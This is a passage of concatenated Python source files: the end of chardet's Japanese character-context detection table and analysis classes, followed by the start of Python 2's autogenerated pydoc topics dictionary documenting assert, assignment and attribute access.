(2,4,0,5,0,4,0,3,0,4,5,5,4,3,5,3,5,3,5,3,5,2,5,3,4,3,3,4,3,4,5,3,2,1,5,4,3,2,3,4,5,3,4,1,2,5,4,3,0,3,3,0,3,2,0,2,3,0,4,1,0,3,4,3,3,5,0,3,0,1,0,4,5,5,5,4,3,0,4,2,0,3,5), (0,5,0,4,0,4,0,2,0,5,4,3,4,3,4,3,3,3,4,3,4,2,5,3,5,3,4,1,4,3,4,4,4,0,3,5,0,4,4,4,4,5,3,1,3,4,5,3,3,3,3,3,3,3,0,2,2,0,3,3,2,4,3,3,3,5,3,4,1,3,3,5,3,2,0,0,0,0,4,3,1,3,3), (0,1,0,3,0,3,0,1,0,1,3,3,3,2,3,3,3,0,3,0,0,0,3,1,3,0,0,0,2,2,2,3,0,0,3,2,0,1,2,4,1,3,3,0,0,3,3,3,0,1,0,0,2,1,0,0,3,0,3,1,0,3,0,0,1,3,0,2,0,1,0,3,3,1,3,3,0,0,1,1,0,3,3), (0,2,0,3,0,2,1,4,0,2,2,3,1,1,3,1,1,0,2,0,3,1,2,3,1,3,0,0,1,0,4,3,2,3,3,3,1,4,2,3,3,3,3,1,0,3,1,4,0,1,1,0,1,2,0,1,1,0,1,1,0,3,1,3,2,2,0,1,0,0,0,2,3,3,3,1,0,0,0,0,0,2,3), (0,5,0,4,0,5,0,2,0,4,5,5,3,3,4,3,3,1,5,4,4,2,4,4,4,3,4,2,4,3,5,5,4,3,3,4,3,3,5,5,4,5,5,1,3,4,5,3,1,4,3,1,3,3,0,3,3,1,4,3,1,4,5,3,3,5,0,4,0,3,0,5,3,3,1,4,3,0,4,0,1,5,3), (0,5,0,5,0,4,0,2,0,4,4,3,4,3,3,3,3,3,5,4,4,4,4,4,4,5,3,3,5,2,4,4,4,3,4,4,3,3,4,4,5,5,3,3,4,3,4,3,3,4,3,3,3,3,1,2,2,1,4,3,3,5,4,4,3,4,0,4,0,3,0,4,4,4,4,4,1,0,4,2,0,2,4), (0,4,0,4,0,3,0,1,0,3,5,2,3,0,3,0,2,1,4,2,3,3,4,1,4,3,3,2,4,1,3,3,3,0,3,3,0,0,3,3,3,5,3,3,3,3,3,2,0,2,0,0,2,0,0,2,0,0,1,0,0,3,1,2,2,3,0,3,0,2,0,4,4,3,3,4,1,0,3,0,0,2,4), (0,0,0,4,0,0,0,0,0,0,1,0,1,0,2,0,0,0,0,0,1,0,2,0,1,0,0,0,0,0,3,1,3,0,3,2,0,0,0,1,0,3,2,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,3,4,0,2,0,0,0,0,0,0,2), (0,2,1,3,0,2,0,2,0,3,3,3,3,1,3,1,3,3,3,3,3,3,4,2,2,1,2,1,4,0,4,3,1,3,3,3,2,4,3,5,4,3,3,3,3,3,3,3,0,1,3,0,2,0,0,1,0,0,1,0,0,4,2,0,2,3,0,3,3,0,3,3,4,2,3,1,4,0,1,2,0,2,3), (0,3,0,3,0,1,0,3,0,2,3,3,3,0,3,1,2,0,3,3,2,3,3,2,3,2,3,1,3,0,4,3,2,0,3,3,1,4,3,3,2,3,4,3,1,3,3,1,1,0,1,1,0,1,0,1,0,1,0,0,0,4,1,1,0,3,0,3,1,0,2,3,3,3,3,3,1,0,0,2,0,3,3), (0,0,0,0,0,0,0,0,0,0,3,0,2,0,3,0,0,0,0,0,0,0,3,0,0,0,0,0,0,0,3,0,3,0,3,1,0,1,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,3,0,2,0,2,3,0,0,0,0,0,0,0,0,3), (0,2,0,3,1,3,0,3,0,2,3,3,3,1,3,1,3,1,3,1,3,3,3,1,3,0,2,3,1,1,4,3,3,2,3,3,1,2,2,4,1,3,3,0,1,4,2,3,0,1,3,0,3,0,0,1,3,0,2,0,0,3,3,2,1,3,0,3,0,2,0,3,4,4,4,3,1,0,3,0,0,3,3), (0,2,0,1,0,2,0,0,0,1,3,2,2,1,3,0,1,1,3,0,3,2,3,1,2,0,2,0,1,1,3,3,3,0,3,3,1,1,2,3,2,3,3,1,2,3,2,0,0,1,0,0,0,0,0,0,3,0,1,0,0,2,1,2,1,3,0,3,0,0,0,3,4,4,4,3,2,0,2,0,0,2,4), (0,0,0,1,0,1,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0,0,0,0,0,2,2,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,3,1,0,0,0,0,0,0,0,3), (0,3,0,3,0,2,0,3,0,3,3,3,2,3,2,2,2,0,3,1,3,3,3,2,3,3,0,0,3,0,3,2,2,0,2,3,1,4,3,4,3,3,2,3,1,5,4,4,0,3,1,2,1,3,0,3,1,1,2,0,2,3,1,3,1,3,0,3,0,1,0,3,3,4,4,2,1,0,2,1,0,2,4), (0,1,0,3,0,1,0,2,0,1,4,2,5,1,4,0,2,0,2,1,3,1,4,0,2,1,0,0,2,1,4,1,1,0,3,3,0,5,1,3,2,3,3,1,0,3,2,3,0,1,0,0,0,0,0,0,1,0,0,0,0,4,0,1,0,3,0,2,0,1,0,3,3,3,4,3,3,0,0,0,0,2,3), (0,0,0,1,0,0,0,0,0,0,2,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,3,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,1,0,0,1,0,0,0,0,0,3), (0,1,0,3,0,4,0,3,0,2,4,3,1,0,3,2,2,1,3,1,2,2,3,1,1,1,2,1,3,0,1,2,0,1,3,2,1,3,0,5,5,1,0,0,1,3,2,1,0,3,0,0,1,0,0,0,0,0,3,4,0,1,1,1,3,2,0,2,0,1,0,2,3,3,1,2,3,0,1,0,1,0,4), (0,0,0,1,0,3,0,3,0,2,2,1,0,0,4,0,3,0,3,1,3,0,3,0,3,0,1,0,3,0,3,1,3,0,3,3,0,0,1,2,1,1,1,0,1,2,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,2,2,1,2,0,0,2,0,0,0,0,2,3,3,3,3,0,0,0,0,1,4), (0,0,0,3,0,3,0,0,0,0,3,1,1,0,3,0,1,0,2,0,1,0,0,0,0,0,0,0,1,0,3,0,2,0,2,3,0,0,2,2,3,1,2,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,3,0,0,2,0,0,0,0,2,3), (2,4,0,5,0,5,0,4,0,3,4,3,3,3,4,3,3,3,4,3,4,4,5,4,5,5,5,2,3,0,5,5,4,1,5,4,3,1,5,4,3,4,4,3,3,4,3,3,0,3,2,0,2,3,0,3,0,0,3,3,0,5,3,2,3,3,0,3,0,3,0,3,4,5,4,5,3,0,4,3,0,3,4), (0,3,0,3,0,3,0,3,0,3,3,4,3,2,3,2,3,0,4,3,3,3,3,3,3,3,3,0,3,2,4,3,3,1,3,4,3,4,4,4,3,4,4,3,2,4,4,1,0,2,0,0,1,1,0,2,0,0,3,1,0,5,3,2,1,3,0,3,0,1,2,4,3,2,4,3,3,0,3,2,0,4,4), (0,3,0,3,0,1,0,0,0,1,4,3,3,2,3,1,3,1,4,2,3,2,4,2,3,4,3,0,2,2,3,3,3,0,3,3,3,0,3,4,1,3,3,0,3,4,3,3,0,1,1,0,1,0,0,0,4,0,3,0,0,3,1,2,1,3,0,4,0,1,0,4,3,3,4,3,3,0,2,0,0,3,3), (0,3,0,4,0,1,0,3,0,3,4,3,3,0,3,3,3,1,3,1,3,3,4,3,3,3,0,0,3,1,5,3,3,1,3,3,2,5,4,3,3,4,5,3,2,5,3,4,0,1,0,0,0,0,0,2,0,0,1,1,0,4,2,2,1,3,0,3,0,2,0,4,4,3,5,3,2,0,1,1,0,3,4), (0,5,0,4,0,5,0,2,0,4,4,3,3,2,3,3,3,1,4,3,4,1,5,3,4,3,4,0,4,2,4,3,4,1,5,4,0,4,4,4,4,5,4,1,3,5,4,2,1,4,1,1,3,2,0,3,1,0,3,2,1,4,3,3,3,4,0,4,0,3,0,4,4,4,3,3,3,0,4,2,0,3,4), (1,4,0,4,0,3,0,1,0,3,3,3,1,1,3,3,2,2,3,3,1,0,3,2,2,1,2,0,3,1,2,1,2,0,3,2,0,2,2,3,3,4,3,0,3,3,1,2,0,1,1,3,1,2,0,0,3,0,1,1,0,3,2,2,3,3,0,3,0,0,0,2,3,3,4,3,3,0,1,0,0,1,4), (0,4,0,4,0,4,0,0,0,3,4,4,3,1,4,2,3,2,3,3,3,1,4,3,4,0,3,0,4,2,3,3,2,2,5,4,2,1,3,4,3,4,3,1,3,3,4,2,0,2,1,0,3,3,0,0,2,0,3,1,0,4,4,3,4,3,0,4,0,1,0,2,4,4,4,4,4,0,3,2,0,3,3), (0,0,0,1,0,4,0,0,0,0,0,0,1,1,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,0,3,2,0,0,1,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,2), (0,2,0,3,0,4,0,4,0,1,3,3,3,0,4,0,2,1,2,1,1,1,2,0,3,1,1,0,1,0,3,1,0,0,3,3,2,0,1,1,0,0,0,0,0,1,0,2,0,2,2,0,3,1,0,0,1,0,1,1,0,1,2,0,3,0,0,0,0,1,0,0,3,3,4,3,1,0,1,0,3,0,2), (0,0,0,3,0,5,0,0,0,0,1,0,2,0,3,1,0,1,3,0,0,0,2,0,0,0,1,0,0,0,1,1,0,0,4,0,0,0,2,3,0,1,4,1,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,3,0,0,0,0,0,1,0,0,0,0,0,0,0,2,0,0,3,0,0,0,0,0,3), (0,2,0,5,0,5,0,1,0,2,4,3,3,2,5,1,3,2,3,3,3,0,4,1,2,0,3,0,4,0,2,2,1,1,5,3,0,0,1,4,2,3,2,0,3,3,3,2,0,2,4,1,1,2,0,1,1,0,3,1,0,1,3,1,2,3,0,2,0,0,0,1,3,5,4,4,4,0,3,0,0,1,3), (0,4,0,5,0,4,0,4,0,4,5,4,3,3,4,3,3,3,4,3,4,4,5,3,4,5,4,2,4,2,3,4,3,1,4,4,1,3,5,4,4,5,5,4,4,5,5,5,2,3,3,1,4,3,1,3,3,0,3,3,1,4,3,4,4,4,0,3,0,4,0,3,3,4,4,5,0,0,4,3,0,4,5), (0,4,0,4,0,3,0,3,0,3,4,4,4,3,3,2,4,3,4,3,4,3,5,3,4,3,2,1,4,2,4,4,3,1,3,4,2,4,5,5,3,4,5,4,1,5,4,3,0,3,2,2,3,2,1,3,1,0,3,3,3,5,3,3,3,5,4,4,2,3,3,4,3,3,3,2,1,0,3,2,1,4,3), (0,4,0,5,0,4,0,3,0,3,5,5,3,2,4,3,4,0,5,4,4,1,4,4,4,3,3,3,4,3,5,5,2,3,3,4,1,2,5,5,3,5,5,2,3,5,5,4,0,3,2,0,3,3,1,1,5,1,4,1,0,4,3,2,3,5,0,4,0,3,0,5,4,3,4,3,0,0,4,1,0,4,4), (1,3,0,4,0,2,0,2,0,2,5,5,3,3,3,3,3,0,4,2,3,4,4,4,3,4,0,0,3,4,5,4,3,3,3,3,2,5,5,4,5,5,5,4,3,5,5,5,1,3,1,0,1,0,0,3,2,0,4,2,0,5,2,3,2,4,1,3,0,3,0,4,5,4,5,4,3,0,4,2,0,5,4), (0,3,0,4,0,5,0,3,0,3,4,4,3,2,3,2,3,3,3,3,3,2,4,3,3,2,2,0,3,3,3,3,3,1,3,3,3,0,4,4,3,4,4,1,1,4,4,2,0,3,1,0,1,1,0,4,1,0,2,3,1,3,3,1,3,4,0,3,0,1,0,3,1,3,0,0,1,0,2,0,0,4,4), (0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0), (0,3,0,3,0,2,0,3,0,1,5,4,3,3,3,1,4,2,1,2,3,4,4,2,4,4,5,0,3,1,4,3,4,0,4,3,3,3,2,3,2,5,3,4,3,2,2,3,0,0,3,0,2,1,0,1,2,0,0,0,0,2,1,1,3,1,0,2,0,4,0,3,4,4,4,5,2,0,2,0,0,1,3), (0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,1,1,0,0,1,1,0,0,0,4,2,1,1,0,1,0,3,2,0,0,3,1,1,1,2,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,3,0,1,0,0,0,2,0,0,0,1,4,0,4,2,1,0,0,0,0,0,1), (0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,0,1,0,0,0,0,0,0,1,0,1,0,0,0,0,3,1,0,0,0,2,0,2,1,0,0,1,2,1,0,1,1,0,0,3,0,0,0,0,0,0,0,0,0,0,0,1,3,1,0,0,0,0,0,1,0,0,2,1,0,0,0,0,0,0,0,0,2), (0,4,0,4,0,4,0,3,0,4,4,3,4,2,4,3,2,0,4,4,4,3,5,3,5,3,3,2,4,2,4,3,4,3,1,4,0,2,3,4,4,4,3,3,3,4,4,4,3,4,1,3,4,3,2,1,2,1,3,3,3,4,4,3,3,5,0,4,0,3,0,4,3,3,3,2,1,0,3,0,0,3,3), (0,4,0,3,0,3,0,3,0,3,5,5,3,3,3,3,4,3,4,3,3,3,4,4,4,3,3,3,3,4,3,5,3,3,1,3,2,4,5,5,5,5,4,3,4,5,5,3,2,2,3,3,3,3,2,3,3,1,2,3,2,4,3,3,3,4,0,4,0,2,0,4,3,2,2,1,2,0,3,0,0,4,1), ) class JapaneseContextAnalysis: def __init__(self): self.reset() def reset(self): self._mTotalRel = 0 # total sequence received # category counters, each interger counts sequence in its category self._mRelSample = [0] * NUM_OF_CATEGORY # if last byte in current buffer is not the last byte of a character, # we need to know how many bytes to skip in next buffer self._mNeedToSkipCharNum = 0 self._mLastCharOrder = -1 # The order of previous char # If this flag is set to True, detection is done and conclusion has # been made self._mDone = False def feed(self, aBuf, aLen): if self._mDone: return # The buffer we got is byte oriented, and a character may span in more than one # buffers. In case the last one or two byte in last buffer is not # complete, we record how many byte needed to complete that character # and skip these bytes here. We can choose to record those bytes as # well and analyse the character once it is complete, but since a # character will not make much difference, by simply skipping # this character will simply our logic and improve performance. i = self._mNeedToSkipCharNum while i < aLen: order, charLen = self.get_order(aBuf[i:i + 2]) i += charLen if i > aLen: self._mNeedToSkipCharNum = i - aLen self._mLastCharOrder = -1 else: if (order != -1) and (self._mLastCharOrder != -1): self._mTotalRel += 1 if self._mTotalRel > MAX_REL_THRESHOLD: self._mDone = True break self._mRelSample[jp2CharContext[self._mLastCharOrder][order]] += 1 self._mLastCharOrder = order def got_enough_data(self): return self._mTotalRel > ENOUGH_REL_THRESHOLD def get_confidence(self): # This is just one way to calculate confidence. It works well for me. if self._mTotalRel > MINIMUM_DATA_THRESHOLD: return (self._mTotalRel - self._mRelSample[0]) / self._mTotalRel else: return DONT_KNOW def get_order(self, aBuf): return -1, 1 class SJISContextAnalysis(JapaneseContextAnalysis): def get_order(self, aBuf): if not aBuf: return -1, 1 # find out current char's byte length first_char = wrap_ord(aBuf[0]) if ((0x81 <= first_char <= 0x9F) or (0xE0 <= first_char <= 0xFC)): charLen = 2 else: charLen = 1 # return its order if it is hiragana if len(aBuf) > 1: second_char = wrap_ord(aBuf[1]) if (first_char == 202) and (0x9F <= second_char <= 0xF1): return second_char - 0x9F, charLen return -1, charLen class EUCJPContextAnalysis(JapaneseContextAnalysis): def get_order(self, aBuf): if not aBuf: return -1, 1 # find out current char's byte length first_char = wrap_ord(aBuf[0]) if (first_char == 0x8E) or (0xA1 <= first_char <= 0xFE): charLen = 2 elif first_char == 0x8F: charLen = 3 else: charLen = 1 # return its order if it is hiragana if len(aBuf) > 1: second_char = wrap_ord(aBuf[1]) if (first_char == 0xA4) and (0xA1 <= second_char <= 0xF3): return second_char - 0xA1, charLen return -1, charLen # flake8: noqa
gpl-2.0
JacerOmri/PokemonGo-Bot-Desktop
pywin/Lib/pydoc_data/topics.py
8
663244
# -*- coding: utf-8 -*- # Autogenerated by Sphinx on Sat Jun 11 14:41:12 2016 topics = {'assert': '\n' 'The "assert" statement\n' '**********************\n' '\n' 'Assert statements are a convenient way to insert debugging ' 'assertions\n' 'into a program:\n' '\n' ' assert_stmt ::= "assert" expression ["," expression]\n' '\n' 'The simple form, "assert expression", is equivalent to\n' '\n' ' if __debug__:\n' ' if not expression: raise AssertionError\n' '\n' 'The extended form, "assert expression1, expression2", is ' 'equivalent to\n' '\n' ' if __debug__:\n' ' if not expression1: raise AssertionError(expression2)\n' '\n' 'These equivalences assume that "__debug__" and "AssertionError" ' 'refer\n' 'to the built-in variables with those names. In the current\n' 'implementation, the built-in variable "__debug__" is "True" under\n' 'normal circumstances, "False" when optimization is requested ' '(command\n' 'line option -O). The current code generator emits no code for an\n' 'assert statement when optimization is requested at compile time. ' 'Note\n' 'that it is unnecessary to include the source code for the ' 'expression\n' 'that failed in the error message; it will be displayed as part of ' 'the\n' 'stack trace.\n' '\n' 'Assignments to "__debug__" are illegal. The value for the ' 'built-in\n' 'variable is determined when the interpreter starts.\n', 'assignment': '\n' 'Assignment statements\n' '*********************\n' '\n' 'Assignment statements are used to (re)bind names to values and ' 'to\n' 'modify attributes or items of mutable objects:\n' '\n' ' assignment_stmt ::= (target_list "=")+ (expression_list | ' 'yield_expression)\n' ' target_list ::= target ("," target)* [","]\n' ' target ::= identifier\n' ' | "(" target_list ")"\n' ' | "[" [target_list] "]"\n' ' | attributeref\n' ' | subscription\n' ' | slicing\n' '\n' '(See section Primaries for the syntax definitions for the last ' 'three\n' 'symbols.)\n' '\n' 'An assignment statement evaluates the expression list ' '(remember that\n' 'this can be a single expression or a comma-separated list, the ' 'latter\n' 'yielding a tuple) and assigns the single resulting object to ' 'each of\n' 'the target lists, from left to right.\n' '\n' 'Assignment is defined recursively depending on the form of the ' 'target\n' '(list). When a target is part of a mutable object (an ' 'attribute\n' 'reference, subscription or slicing), the mutable object must\n' 'ultimately perform the assignment and decide about its ' 'validity, and\n' 'may raise an exception if the assignment is unacceptable. The ' 'rules\n' 'observed by various types and the exceptions raised are given ' 'with the\n' 'definition of the object types (see section The standard type\n' 'hierarchy).\n' '\n' 'Assignment of an object to a target list is recursively ' 'defined as\n' 'follows.\n' '\n' '* If the target list is a single target: The object is ' 'assigned to\n' ' that target.\n' '\n' '* If the target list is a comma-separated list of targets: ' 'The\n' ' object must be an iterable with the same number of items as ' 'there\n' ' are targets in the target list, and the items are assigned, ' 'from\n' ' left to right, to the corresponding targets.\n' '\n' 'Assignment of an object to a single target is recursively ' 'defined as\n' 'follows.\n' '\n' '* If the target is an identifier (name):\n' '\n' ' * If the name does not occur in a "global" statement in the\n' ' current code block: the name is bound to the object in the ' 'current\n' ' local namespace.\n' '\n' ' * Otherwise: the name is bound to the object in the current ' 'global\n' ' namespace.\n' '\n' ' The name is rebound if it was already bound. This may cause ' 'the\n' ' reference count for the object previously bound to the name ' 'to reach\n' ' zero, causing the object to be deallocated and its ' 'destructor (if it\n' ' has one) to be called.\n' '\n' '* If the target is a target list enclosed in parentheses or ' 'in\n' ' square brackets: The object must be an iterable with the ' 'same number\n' ' of items as there are targets in the target list, and its ' 'items are\n' ' assigned, from left to right, to the corresponding targets.\n' '\n' '* If the target is an attribute reference: The primary ' 'expression in\n' ' the reference is evaluated. It should yield an object with\n' ' assignable attributes; if this is not the case, "TypeError" ' 'is\n' ' raised. That object is then asked to assign the assigned ' 'object to\n' ' the given attribute; if it cannot perform the assignment, it ' 'raises\n' ' an exception (usually but not necessarily ' '"AttributeError").\n' '\n' ' Note: If the object is a class instance and the attribute ' 'reference\n' ' occurs on both sides of the assignment operator, the RHS ' 'expression,\n' ' "a.x" can access either an instance attribute or (if no ' 'instance\n' ' attribute exists) a class attribute. The LHS target "a.x" ' 'is always\n' ' set as an instance attribute, creating it if necessary. ' 'Thus, the\n' ' two occurrences of "a.x" do not necessarily refer to the ' 'same\n' ' attribute: if the RHS expression refers to a class ' 'attribute, the\n' ' LHS creates a new instance attribute as the target of the\n' ' assignment:\n' '\n' ' class Cls:\n' ' x = 3 # class variable\n' ' inst = Cls()\n' ' inst.x = inst.x + 1 # writes inst.x as 4 leaving Cls.x ' 'as 3\n' '\n' ' This description does not necessarily apply to descriptor\n' ' attributes, such as properties created with "property()".\n' '\n' '* If the target is a subscription: The primary expression in ' 'the\n' ' reference is evaluated. It should yield either a mutable ' 'sequence\n' ' object (such as a list) or a mapping object (such as a ' 'dictionary).\n' ' Next, the subscript expression is evaluated.\n' '\n' ' If the primary is a mutable sequence object (such as a ' 'list), the\n' ' subscript must yield a plain integer. If it is negative, ' 'the\n' " sequence's length is added to it. The resulting value must " 'be a\n' " nonnegative integer less than the sequence's length, and " 'the\n' ' sequence is asked to assign the assigned object to its item ' 'with\n' ' that index. If the index is out of range, "IndexError" is ' 'raised\n' ' (assignment to a subscripted sequence cannot add new items ' 'to a\n' ' list).\n' '\n' ' If the primary is a mapping object (such as a dictionary), ' 'the\n' " subscript must have a type compatible with the mapping's key " 'type,\n' ' and the mapping is then asked to create a key/datum pair ' 'which maps\n' ' the subscript to the assigned object. This can either ' 'replace an\n' ' existing key/value pair with the same key value, or insert a ' 'new\n' ' key/value pair (if no key with the same value existed).\n' '\n' '* If the target is a slicing: The primary expression in the\n' ' reference is evaluated. It should yield a mutable sequence ' 'object\n' ' (such as a list). The assigned object should be a sequence ' 'object\n' ' of the same type. Next, the lower and upper bound ' 'expressions are\n' ' evaluated, insofar they are present; defaults are zero and ' 'the\n' " sequence's length. The bounds should evaluate to (small) " 'integers.\n' " If either bound is negative, the sequence's length is added " 'to it.\n' ' The resulting bounds are clipped to lie between zero and ' 'the\n' " sequence's length, inclusive. Finally, the sequence object " 'is asked\n' ' to replace the slice with the items of the assigned ' 'sequence. The\n' ' length of the slice may be different from the length of the ' 'assigned\n' ' sequence, thus changing the length of the target sequence, ' 'if the\n' ' object allows it.\n' '\n' '**CPython implementation detail:** In the current ' 'implementation, the\n' 'syntax for targets is taken to be the same as for expressions, ' 'and\n' 'invalid syntax is rejected during the code generation phase, ' 'causing\n' 'less detailed error messages.\n' '\n' 'WARNING: Although the definition of assignment implies that ' 'overlaps\n' "between the left-hand side and the right-hand side are 'safe' " '(for\n' 'example "a, b = b, a" swaps two variables), overlaps *within* ' 'the\n' 'collection of assigned-to variables are not safe! For ' 'instance, the\n' 'following program prints "[0, 2]":\n' '\n' ' x = [0, 1]\n' ' i = 0\n' ' i, x[i] = 1, 2\n' ' print x\n' '\n' '\n' 'Augmented assignment statements\n' '===============================\n' '\n' 'Augmented assignment is the combination, in a single ' 'statement, of a\n' 'binary operation and an assignment statement:\n' '\n' ' augmented_assignment_stmt ::= augtarget augop ' '(expression_list | yield_expression)\n' ' augtarget ::= identifier | attributeref | ' 'subscription | slicing\n' ' augop ::= "+=" | "-=" | "*=" | "/=" | ' '"//=" | "%=" | "**="\n' ' | ">>=" | "<<=" | "&=" | "^=" | "|="\n' '\n' '(See section Primaries for the syntax definitions for the last ' 'three\n' 'symbols.)\n' '\n' 'An augmented assignment evaluates the target (which, unlike ' 'normal\n' 'assignment statements, cannot be an unpacking) and the ' 'expression\n' 'list, performs the binary operation specific to the type of ' 'assignment\n' 'on the two operands, and assigns the result to the original ' 'target.\n' 'The target is only evaluated once.\n' '\n' 'An augmented assignment expression like "x += 1" can be ' 'rewritten as\n' '"x = x + 1" to achieve a similar, but not exactly equal ' 'effect. In the\n' 'augmented version, "x" is only evaluated once. Also, when ' 'possible,\n' 'the actual operation is performed *in-place*, meaning that ' 'rather than\n' 'creating a new object and assigning that to the target, the ' 'old object\n' 'is modified instead.\n' '\n' 'With the exception of assigning to tuples and multiple targets ' 'in a\n' 'single statement, the assignment done by augmented assignment\n' 'statements is handled the same way as normal assignments. ' 'Similarly,\n' 'with the exception of the possible *in-place* behavior, the ' 'binary\n' 'operation performed by augmented assignment is the same as the ' 'normal\n' 'binary operations.\n' '\n' 'For targets which are attribute references, the same caveat ' 'about\n' 'class and instance attributes applies as for regular ' 'assignments.\n', 'atom-identifiers': '\n' 'Identifiers (Names)\n' '*******************\n' '\n' 'An identifier occurring as an atom is a name. See ' 'section Identifiers\n' 'and keywords for lexical definition and section Naming ' 'and binding for\n' 'documentation of naming and binding.\n' '\n' 'When the name is bound to an object, evaluation of the ' 'atom yields\n' 'that object. When a name is not bound, an attempt to ' 'evaluate it\n' 'raises a "NameError" exception.\n' '\n' '**Private name mangling:** When an identifier that ' 'textually occurs in\n' 'a class definition begins with two or more underscore ' 'characters and\n' 'does not end in two or more underscores, it is ' 'considered a *private\n' 'name* of that class. Private names are transformed to a ' 'longer form\n' 'before code is generated for them. The transformation ' 'inserts the\n' 'class name, with leading underscores removed and a ' 'single underscore\n' 'inserted, in front of the name. For example, the ' 'identifier "__spam"\n' 'occurring in a class named "Ham" will be transformed to ' '"_Ham__spam".\n' 'This transformation is independent of the syntactical ' 'context in which\n' 'the identifier is used. If the transformed name is ' 'extremely long\n' '(longer than 255 characters), implementation defined ' 'truncation may\n' 'happen. If the class name consists only of underscores, ' 'no\n' 'transformation is done.\n', 'atom-literals': '\n' 'Literals\n' '********\n' '\n' 'Python supports string literals and various numeric ' 'literals:\n' '\n' ' literal ::= stringliteral | integer | longinteger\n' ' | floatnumber | imagnumber\n' '\n' 'Evaluation of a literal yields an object of the given type ' '(string,\n' 'integer, long integer, floating point number, complex ' 'number) with the\n' 'given value. The value may be approximated in the case of ' 'floating\n' 'point and imaginary (complex) literals. See section ' 'Literals for\n' 'details.\n' '\n' 'All literals correspond to immutable data types, and hence ' 'the\n' "object's identity is less important than its value. " 'Multiple\n' 'evaluations of literals with the same value (either the ' 'same\n' 'occurrence in the program text or a different occurrence) ' 'may obtain\n' 'the same object or a different object with the same ' 'value.\n', 'attribute-access': '\n' 'Customizing attribute access\n' '****************************\n' '\n' 'The following methods can be defined to customize the ' 'meaning of\n' 'attribute access (use of, assignment to, or deletion of ' '"x.name") for\n' 'class instances.\n' '\n' 'object.__getattr__(self, name)\n' '\n' ' Called when an attribute lookup has not found the ' 'attribute in the\n' ' usual places (i.e. it is not an instance attribute ' 'nor is it found\n' ' in the class tree for "self"). "name" is the ' 'attribute name. This\n' ' method should return the (computed) attribute value ' 'or raise an\n' ' "AttributeError" exception.\n' '\n' ' Note that if the attribute is found through the ' 'normal mechanism,\n' ' "__getattr__()" is not called. (This is an ' 'intentional asymmetry\n' ' between "__getattr__()" and "__setattr__()".) This is ' 'done both for\n' ' efficiency reasons and because otherwise ' '"__getattr__()" would have\n' ' no way to access other attributes of the instance. ' 'Note that at\n' ' least for instance variables, you can fake total ' 'control by not\n' ' inserting any values in the instance attribute ' 'dictionary (but\n' ' instead inserting them in another object). See the\n' ' "__getattribute__()" method below for a way to ' 'actually get total\n' ' control in new-style classes.\n' '\n' 'object.__setattr__(self, name, value)\n' '\n' ' Called when an attribute assignment is attempted. ' 'This is called\n' ' instead of the normal mechanism (i.e. store the value ' 'in the\n' ' instance dictionary). *name* is the attribute name, ' '*value* is the\n' ' value to be assigned to it.\n' '\n' ' If "__setattr__()" wants to assign to an instance ' 'attribute, it\n' ' should not simply execute "self.name = value" --- ' 'this would cause\n' ' a recursive call to itself. Instead, it should ' 'insert the value in\n' ' the dictionary of instance attributes, e.g., ' '"self.__dict__[name] =\n' ' value". For new-style classes, rather than accessing ' 'the instance\n' ' dictionary, it should call the base class method with ' 'the same\n' ' name, for example, "object.__setattr__(self, name, ' 'value)".\n' '\n' 'object.__delattr__(self, name)\n' '\n' ' Like "__setattr__()" but for attribute deletion ' 'instead of\n' ' assignment. This should only be implemented if "del ' 'obj.name" is\n' ' meaningful for the object.\n' '\n' '\n' 'More attribute access for new-style classes\n' '===========================================\n' '\n' 'The following methods only apply to new-style classes.\n' '\n' 'object.__getattribute__(self, name)\n' '\n' ' Called unconditionally to implement attribute ' 'accesses for\n' ' instances of the class. If the class also defines ' '"__getattr__()",\n' ' the latter will not be called unless ' '"__getattribute__()" either\n' ' calls it explicitly or raises an "AttributeError". ' 'This method\n' ' should return the (computed) attribute value or raise ' 'an\n' ' "AttributeError" exception. In order to avoid ' 'infinite recursion in\n' ' this method, its implementation should always call ' 'the base class\n' ' method with the same name to access any attributes it ' 'needs, for\n' ' example, "object.__getattribute__(self, name)".\n' '\n' ' Note: This method may still be bypassed when looking ' 'up special\n' ' methods as the result of implicit invocation via ' 'language syntax\n' ' or built-in functions. See Special method lookup ' 'for new-style\n' ' classes.\n' '\n' '\n' 'Implementing Descriptors\n' '========================\n' '\n' 'The following methods only apply when an instance of the ' 'class\n' 'containing the method (a so-called *descriptor* class) ' 'appears in an\n' '*owner* class (the descriptor must be in either the ' "owner's class\n" 'dictionary or in the class dictionary for one of its ' 'parents). In the\n' 'examples below, "the attribute" refers to the attribute ' 'whose name is\n' "the key of the property in the owner class' " '"__dict__".\n' '\n' 'object.__get__(self, instance, owner)\n' '\n' ' Called to get the attribute of the owner class (class ' 'attribute\n' ' access) or of an instance of that class (instance ' 'attribute\n' ' access). *owner* is always the owner class, while ' '*instance* is the\n' ' instance that the attribute was accessed through, or ' '"None" when\n' ' the attribute is accessed through the *owner*. This ' 'method should\n' ' return the (computed) attribute value or raise an ' '"AttributeError"\n' ' exception.\n' '\n' 'object.__set__(self, instance, value)\n' 